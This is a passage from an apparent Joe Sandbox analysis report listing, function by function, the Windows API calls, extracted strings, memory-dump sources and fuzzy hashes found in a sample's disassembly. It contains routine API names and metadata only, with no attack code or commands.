                                                                                                                                        • Instruction Fuzzy Hash: 64918E356182019FD320EF19D489F1ABBE0EF4A318F1485E9F4699B6A2CB70ED45CF91
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _wcslen$BuffCharLower
                                                                                                                                        • String ID: cdecl$none$stdcall$winapi
                                                                                                                                        • API String ID: 707087890-567219261
                                                                                                                                        • Opcode ID: b6ecf14b1169d4aa4f1a6ab0148297936a36581c3444268c424a28057c6675bd
                                                                                                                                        • Instruction ID: fc0f14167e8a877726ddeef0faba4bad7483475b0277b0dd8cb143e4712ee31a
                                                                                                                                        • Opcode Fuzzy Hash: b6ecf14b1169d4aa4f1a6ab0148297936a36581c3444268c424a28057c6675bd
                                                                                                                                        • Instruction Fuzzy Hash: FB518131A08116DBCB14DF6CC9509BEB7E6FF66724B2042A9E466A7684DF30DE40C790
                                                                                                                                        APIs
                                                                                                                                        • CoInitialize.OLE32 ref: 00BA3774
                                                                                                                                        • CoUninitialize.OLE32 ref: 00BA377F
                                                                                                                                        • CoCreateInstance.OLE32(?,00000000,00000017,00BBFB78,?), ref: 00BA37D9
                                                                                                                                        • IIDFromString.OLE32(?,?), ref: 00BA384C
                                                                                                                                        • VariantInit.OLEAUT32(?), ref: 00BA38E4
                                                                                                                                        • VariantClear.OLEAUT32(?), ref: 00BA3936
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
                                                                                                                                        • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                                                                        • API String ID: 636576611-1287834457
                                                                                                                                        • Opcode ID: e3f527847f2cd14d575afc13d68c8dd5742c099da125798248a5fc57a3bcbc5f
                                                                                                                                        • Instruction ID: 4451119e01e177235ad0c04856ebe06b6fd98eb9ca1515028c51497d866f5d86
                                                                                                                                        • Opcode Fuzzy Hash: e3f527847f2cd14d575afc13d68c8dd5742c099da125798248a5fc57a3bcbc5f
                                                                                                                                        • Instruction Fuzzy Hash: 5661B270608311AFD710DF54D888F6ABBE4EF4AB10F10499DF5859B2A1DB74EE48CB92
                                                                                                                                        APIs
                                                                                                                                        • GetLocalTime.KERNEL32(?), ref: 00B98257
                                                                                                                                        • SystemTimeToFileTime.KERNEL32(?,?), ref: 00B98267
                                                                                                                                        • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00B98273
                                                                                                                                        • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00B98310
                                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00B98324
                                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00B98356
                                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00B9838C
                                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00B98395
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CurrentDirectoryTime$File$Local$System
                                                                                                                                        • String ID: *.*
                                                                                                                                        • API String ID: 1464919966-438819550
                                                                                                                                        • Opcode ID: b014e8d06c27459977d98d11542a5d4b077514125d28454278894b6d4396a084
                                                                                                                                        • Instruction ID: 59c9e01629b7962a68066a11dd6c3a0444ba81cde034c50289a5c764fd748e6d
                                                                                                                                        • Opcode Fuzzy Hash: b014e8d06c27459977d98d11542a5d4b077514125d28454278894b6d4396a084
                                                                                                                                        • Instruction Fuzzy Hash: 29617A725083159FCB10EF64D8809AEB7E8FF89310F0489AEF999D7251DB31E945CB92
                                                                                                                                        APIs
                                                                                                                                        • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 00B933CF
                                                                                                                                          • Part of subcall function 00B29CB3: _wcslen.LIBCMT ref: 00B29CBD
                                                                                                                                        • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 00B933F0
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: LoadString$_wcslen
                                                                                                                                        • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                                                                                                                        • API String ID: 4099089115-3080491070
                                                                                                                                        • Opcode ID: ad861638d6564761b3e161debeb1da2a93de330f64d7315e8952d307b1533120
                                                                                                                                        • Instruction ID: c757eb76b41053bddc8b06e87211cc96806356a1c592879903b3caefcaf5d069
                                                                                                                                        • Opcode Fuzzy Hash: ad861638d6564761b3e161debeb1da2a93de330f64d7315e8952d307b1533120
                                                                                                                                        • Instruction Fuzzy Hash: FD518C71800219AADF15EBA0DD42EEEB7F8EF18740F1445A5F009731A2EB356F58CB60
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _wcslen$BuffCharUpper
                                                                                                                                        • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                                                                                                        • API String ID: 1256254125-769500911
                                                                                                                                        • Opcode ID: 917b3e7afc1a06810fa6452b822cadf0d94070fd7a1fb356aa88f868347e39e9
                                                                                                                                        • Instruction ID: 166f37df3315af8fc55b883f7db314750dcd0bf9e6a27013fc283a7caf3ec40c
                                                                                                                                        • Opcode Fuzzy Hash: 917b3e7afc1a06810fa6452b822cadf0d94070fd7a1fb356aa88f868347e39e9
                                                                                                                                        • Instruction Fuzzy Hash: D841A532A001279BCB207F7D88909BEB7E5EF61794B2542A9E425DB2A4F731CD81D790
                                                                                                                                        APIs
                                                                                                                                        • SetErrorMode.KERNEL32(00000001), ref: 00B953A0
                                                                                                                                        • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00B95416
                                                                                                                                        • GetLastError.KERNEL32 ref: 00B95420
                                                                                                                                        • SetErrorMode.KERNEL32(00000000,READY), ref: 00B954A7
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Error$Mode$DiskFreeLastSpace
                                                                                                                                        • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                                                                                        • API String ID: 4194297153-14809454
                                                                                                                                        • Opcode ID: 3d1badc8e29ecf32b4c64938aa38cf163938bd43d32cd4e0591503c4d479c9ec
                                                                                                                                        • Instruction ID: 75e2831e429d0c0379c856dd64e2cd47ed454f66f176cedee7aed0fe74c5646d
                                                                                                                                        • Opcode Fuzzy Hash: 3d1badc8e29ecf32b4c64938aa38cf163938bd43d32cd4e0591503c4d479c9ec
                                                                                                                                        • Instruction Fuzzy Hash: 0D31C335A406089FCB62DF68C884AAABBF4EF54305F1480F5E405DB396DB70DD82CB90
                                                                                                                                        APIs
                                                                                                                                        • CreateMenu.USER32 ref: 00BB3C79
                                                                                                                                        • SetMenu.USER32(?,00000000), ref: 00BB3C88
                                                                                                                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00BB3D10
                                                                                                                                        • IsMenu.USER32(?), ref: 00BB3D24
                                                                                                                                        • CreatePopupMenu.USER32 ref: 00BB3D2E
                                                                                                                                        • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00BB3D5B
                                                                                                                                        • DrawMenuBar.USER32 ref: 00BB3D63
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                                                                                                        • String ID: 0$F
                                                                                                                                        • API String ID: 161812096-3044882817
                                                                                                                                        • Opcode ID: 109232b13f1c07e57668e2224381e60f27d3c31aa073fc1e532e984df4e8343a
                                                                                                                                        • Instruction ID: b323f6053ab1a332c909d6704b11db9b89e36584879927b377a402956d981df8
                                                                                                                                        • Opcode Fuzzy Hash: 109232b13f1c07e57668e2224381e60f27d3c31aa073fc1e532e984df4e8343a
                                                                                                                                        • Instruction Fuzzy Hash: 40419C74A01209EFDB24CF64D884AEA7BF5FF49300F140169F956A7360DBB0AA10CF90
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00B29CB3: _wcslen.LIBCMT ref: 00B29CBD
                                                                                                                                          • Part of subcall function 00B83CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00B83CCA
                                                                                                                                        • SendMessageW.USER32(?,0000018C,000000FF,00020000), ref: 00B81F64
                                                                                                                                        • GetDlgCtrlID.USER32 ref: 00B81F6F
                                                                                                                                        • GetParent.USER32 ref: 00B81F8B
                                                                                                                                        • SendMessageW.USER32(00000000,?,00000111,?), ref: 00B81F8E
                                                                                                                                        • GetDlgCtrlID.USER32(?), ref: 00B81F97
                                                                                                                                        • GetParent.USER32(?), ref: 00B81FAB
                                                                                                                                        • SendMessageW.USER32(00000000,?,00000111,?), ref: 00B81FAE
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessageSend$CtrlParent$ClassName_wcslen
                                                                                                                                        • String ID: ComboBox$ListBox
                                                                                                                                        • API String ID: 711023334-1403004172
                                                                                                                                        • Opcode ID: 4622bb4d54975c4282707f2d2ca255b618d891318e94c91ed9bc1ea99ea1390e
                                                                                                                                        • Instruction ID: 5beb963db490a07b3de309d8298fc8016cacacad75c0dcf1144d134314e1f067
                                                                                                                                        • Opcode Fuzzy Hash: 4622bb4d54975c4282707f2d2ca255b618d891318e94c91ed9bc1ea99ea1390e
                                                                                                                                        • Instruction Fuzzy Hash: 9821B074900218BBCF04EFA4DC85DEEBBF8EF19350F004695BA66672A1DBB45905DB60
                                                                                                                                        APIs
                                                                                                                                        • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00BB3A9D
                                                                                                                                        • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00BB3AA0
                                                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00BB3AC7
                                                                                                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00BB3AEA
                                                                                                                                        • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00BB3B62
                                                                                                                                        • SendMessageW.USER32(?,00001074,00000000,00000007), ref: 00BB3BAC
                                                                                                                                        • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 00BB3BC7
                                                                                                                                        • SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 00BB3BE2
                                                                                                                                        • SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 00BB3BF6
                                                                                                                                        • SendMessageW.USER32(?,00001008,00000000,00000007), ref: 00BB3C13
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessageSend$LongWindow
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 312131281-0
                                                                                                                                        • Opcode ID: 47147dab95c7a9a7e551660e39f0f6c8a38bc80fdf2293bafa12ebee3a29ed39
                                                                                                                                        • Instruction ID: 6d42274471389af1321e5aed328a8d8cab70fc02f94ec170cf32137ba6e3cb65
                                                                                                                                        • Opcode Fuzzy Hash: 47147dab95c7a9a7e551660e39f0f6c8a38bc80fdf2293bafa12ebee3a29ed39
                                                                                                                                        • Instruction Fuzzy Hash: BD617A75900248AFDB20DFA8CC81EFE77F8EB09700F104599FA15A72A1DBB4AE45DB50
                                                                                                                                        APIs
                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00B8B151
                                                                                                                                        • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00B8A1E1,?,00000001), ref: 00B8B165
                                                                                                                                        • GetWindowThreadProcessId.USER32(00000000), ref: 00B8B16C
                                                                                                                                        • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00B8A1E1,?,00000001), ref: 00B8B17B
                                                                                                                                        • GetWindowThreadProcessId.USER32(?,00000000), ref: 00B8B18D
                                                                                                                                        • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,00B8A1E1,?,00000001), ref: 00B8B1A6
                                                                                                                                        • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00B8A1E1,?,00000001), ref: 00B8B1B8
                                                                                                                                        • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00B8A1E1,?,00000001), ref: 00B8B1FD
                                                                                                                                        • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,00B8A1E1,?,00000001), ref: 00B8B212
                                                                                                                                        • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,00B8A1E1,?,00000001), ref: 00B8B21D
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2156557900-0
                                                                                                                                        • Opcode ID: 552c51550efdb369ef8541117bbe58a4cdb318a3c4e8574708a88aa041ed8f7c
                                                                                                                                        • Instruction ID: 3022a890fb36026f601465f29b4e0d7cf803e575acf731e01a97b66507582747
                                                                                                                                        • Opcode Fuzzy Hash: 552c51550efdb369ef8541117bbe58a4cdb318a3c4e8574708a88aa041ed8f7c
                                                                                                                                        • Instruction Fuzzy Hash: 723148B5510204AFDB10AF78DC98FB97FE9EB51711F204156FA05EB1A0DFB4AA40CB64
                                                                                                                                        APIs
                                                                                                                                        • _free.LIBCMT ref: 00B52C94
                                                                                                                                          • Part of subcall function 00B529C8: HeapFree.KERNEL32(00000000,00000000,?,00B5D7D1,00000000,00000000,00000000,00000000,?,00B5D7F8,00000000,00000007,00000000,?,00B5DBF5,00000000), ref: 00B529DE
                                                                                                                                          • Part of subcall function 00B529C8: GetLastError.KERNEL32(00000000,?,00B5D7D1,00000000,00000000,00000000,00000000,?,00B5D7F8,00000000,00000007,00000000,?,00B5DBF5,00000000,00000000), ref: 00B529F0
                                                                                                                                        • _free.LIBCMT ref: 00B52CA0
                                                                                                                                        • _free.LIBCMT ref: 00B52CAB
                                                                                                                                        • _free.LIBCMT ref: 00B52CB6
                                                                                                                                        • _free.LIBCMT ref: 00B52CC1
                                                                                                                                        • _free.LIBCMT ref: 00B52CCC
                                                                                                                                        • _free.LIBCMT ref: 00B52CD7
                                                                                                                                        • _free.LIBCMT ref: 00B52CE2
                                                                                                                                        • _free.LIBCMT ref: 00B52CED
                                                                                                                                        • _free.LIBCMT ref: 00B52CFB
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 776569668-0
                                                                                                                                        • Opcode ID: acfa974a58b1c3f82066a7108ab7f1110afe976473d32e6a905f983f5fa70f09
                                                                                                                                        • Instruction ID: c26d226dce91b573d0ad390f963b48ff3064b540b6e3783ab3afa38ea658b2cb
                                                                                                                                        • Opcode Fuzzy Hash: acfa974a58b1c3f82066a7108ab7f1110afe976473d32e6a905f983f5fa70f09
                                                                                                                                        • Instruction Fuzzy Hash: 12119376101108AFCB02EF54D882EDD3BA5FF06351F5144E5FE48AB322DA31EE549B90
                                                                                                                                        APIs
                                                                                                                                        • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00B21459
                                                                                                                                        • OleUninitialize.OLE32(?,00000000), ref: 00B214F8
                                                                                                                                        • UnregisterHotKey.USER32(?), ref: 00B216DD
                                                                                                                                        • DestroyWindow.USER32(?), ref: 00B624B9
                                                                                                                                        • FreeLibrary.KERNEL32(?), ref: 00B6251E
                                                                                                                                        • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00B6254B
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                                                                                        • String ID: close all
                                                                                                                                        • API String ID: 469580280-3243417748
                                                                                                                                        • Opcode ID: 523a8a27676bf71d21d9f6d1171d253d75a1d0a7495258af9e30dafd7909f7b1
                                                                                                                                        • Instruction ID: ec0cdf6c54fd41d66a6081a8a56d519e752159d02bc1facb0a07584ab5f9a09a
                                                                                                                                        • Opcode Fuzzy Hash: 523a8a27676bf71d21d9f6d1171d253d75a1d0a7495258af9e30dafd7909f7b1
                                                                                                                                        • Instruction Fuzzy Hash: C6D139317016228FDB29EF18D899A69F7E4BF15700F2446EDE44E6B261DB34AD12CF50
                                                                                                                                        APIs
                                                                                                                                        • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00B97FAD
                                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00B97FC1
                                                                                                                                        • GetFileAttributesW.KERNEL32(?), ref: 00B97FEB
                                                                                                                                        • SetFileAttributesW.KERNEL32(?,00000000), ref: 00B98005
                                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00B98017
                                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00B98060
                                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00B980B0
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CurrentDirectory$AttributesFile
                                                                                                                                        • String ID: *.*
                                                                                                                                        • API String ID: 769691225-438819550
                                                                                                                                        • Opcode ID: a1d6a9621ca64bc3be61d2347f3989326b172627757e09df4ce4be425f19a5c2
                                                                                                                                        • Instruction ID: cc7702efa7f31be949d212c0d8c6062f8810bc27ec3a305fe5fe2e97e98968d5
                                                                                                                                        • Opcode Fuzzy Hash: a1d6a9621ca64bc3be61d2347f3989326b172627757e09df4ce4be425f19a5c2
                                                                                                                                        • Instruction Fuzzy Hash: AC81A0715586419BCF20EF14C884AAEB7E8FF89310F1448AEF889D7250EB34DD498B92
                                                                                                                                        APIs
                                                                                                                                        • SetWindowLongW.USER32(?,000000EB), ref: 00B25C7A
                                                                                                                                          • Part of subcall function 00B25D0A: GetClientRect.USER32(?,?), ref: 00B25D30
                                                                                                                                          • Part of subcall function 00B25D0A: GetWindowRect.USER32(?,?), ref: 00B25D71
